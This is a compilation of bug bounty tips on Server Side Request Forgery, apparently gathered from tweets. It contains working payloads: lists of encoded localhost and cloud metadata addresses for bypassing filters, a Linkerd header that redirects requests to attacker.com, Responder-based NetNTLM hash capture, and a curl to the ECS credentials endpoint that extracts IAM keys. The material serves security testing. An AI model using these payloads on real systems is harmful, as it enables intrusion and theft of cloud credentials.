Book of BugBounty Tips
Server Side Request Forgery (SSRF)
#BugBounty Tip: When you find an SSRF vulnerability, run Responder on your server and make the vulnerable system connect back to you. Sometimes you can get NetNTLM hashes and either crack them or escalate it to an SMB Relay attack. #bugbountytip
Use URLs with embedded credentials (e.g. http://user:pass@host) to login on internal http services when exploiting SSRF vulnerability.
#bugbountytip Found Linkerd service (look for headers such as “Via: linkerd” or “l5d-*”)? Try SSRF by overriding dtab via request header, e.g. “l5d-dtab: /svc/* => /$/inet/attacker.com/80” to reach your server or “l5d-dtab: /svc/* => /$/inet/169.254.169.254/80” for AWS metadata.
In case you wanted to test an SSRF but don't own a vps and burp collaborator is blocked you can use this https://canarytokens.org/generate
#Bugbountytip Got a SSRF? No metadata endpoints to hit? Try https://kubernetes.default.svc/metrics; if you get a load of crap back, jackpot, you've hit the Kubernetes API and this should indicate it's shit-the-bed time for any security team. (URL can change)
When you have a SSRF vulnerability on a Google Cloud server, the fastest way to grab all internal metadata is this "All in one" payload : hxxp://metadata.google.internal/computeMetadata/v1beta1/?recursive=true #BugBountyTip
Just had a weird SSRF 'bypass' which would only pull data from their domain so anything you queried would be hxxps://www.theirdomain.com/reflectedhere/. Weirdly using /%2F//mysite.com/ caused it to hit external sites. Why? I have no idea. #bugbountytip
When dealing with SVG XLINK SSRF, in order to fingerprint the versions of libraries on the vulnerable server, generate the wordlist locally and fuzz it: find /usr -type f -name "*.png" >> all_usr_png.txt #bugbountytip
Did you find the #SSRF, but http://169.254.169.254/ is blacklisted? #protip try http://0xA9FEA9FE/, http://0251.0376.0251.0376/ or get more examples from @agarri_fr talk
#BugBounty #bugbounties #bugbountytip #infosec Bypass #SSRF filters by using http://127.1 instead of http://127.0.0.1 It resolves to the same but confuses filters blocking localhost/127.0.0.1 specifically!
#SSRF #ProTip Sometimes, the server appends something (path, parameters, ...) to an URL your control. Simply add "#" to your URL, that may work!
Found a JIRA SSRF and want to make it more impactful? Look for what's running on port 7990, you might end up in a BitBucket server running internally with public repo access. If yes, source code is just a few hacks away.
If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(http://google.com) and see if XML/HTML is added to the form (insta-SSRF). No clue Excel even had this function #bugbountytip #bugbountytips
169.254.169.254
http://169.254.169.254.xip.io
credit to @xenonxesece tweet. #SSRF #bugbountytips #Bugcrowd #bugbounty
SSRF:
file:///etc/passwd : Not authorized
file://\/\/etc/passwd : Work
One ssrf/lfi I come across is using UNC file paths. If you're testing a windows host and the application is loading file.txt you can replace that with \\http://dns.you.com\a and look for a dns hit and then try Responder if there's egress or \\[email protected]\
When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past. #bugbountytip #bugbountytip #bugbounty
When testing for SSRF using a black list, take internal IP addresses and when encoding them, don't encode the entire IP. Encode 1 octet of the IP address, or 2 or 3. For instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
Got RCE or SSRF inside an AWS Lambda function? Request "localhost:9001/2018-06-01/runtime/invocation/next" for the function's event data. Check the HTTP headers returned
If you have an SSRF with file system access on an ECS instance then try extracting /proc/self/environ to get UUID and then try hitting ECS metadata curl http://169.254.170.2/v2/credentials/
This way you'll extract IAM keys of the attached role
SSRF at an endpoint looking for a valid YouTube url. http://127.0.0.1:80 doesn’t work but http://127.0.0.1:80?http://youtu.be/dQw4w9WgXcQ works
SSRF AWS Bypasses to access metadata endpoint.
Converted Decimal IP: http://2852039166/latest/meta-data/
IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
#bugbounty #bugbountytips #bugbountytip
SSRF Bypass list for localhost (127.0.0.1):
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://[email protected]
http://0x7f000001/
http://017700000001
http://0177.00.00.01
Also using a redirect to localhost will often work.
SSRF payloads:
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/
http://0177.0.0.1/
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
A small Burpsuite trick which helped me to find Blind SSRF:
Step 1: Use Intruder to bruteforce headers.
Step 2: Add Burp Collaborator URL as value.
Step 3: Add prefix numerical payload (Pitchfork).
Step 4: Use Taborator extension to monitor hits.
When you find a public form (contact form, etc.) try these payloads (blind ssrf); if you receive a request on your server, try SSTI... #bugbountytips #bugbounty #bugbountytip
https://twitter.com/SMHTahsin33/status/1293601681834307584?s=20
https://twitter.com/z0idsec/status/1301145611303940096?s=20
add this one to your wordlist: /_includes/framer.php juicy blind ssrf via `base` param #bugbountytips #bugbountytip
If you have a blind SSRF that can only read images (but for some reason can't read ICO files), try and find Confluence running on the internal network and request /images/icons/linkext7.gif to prove that you can access internal resources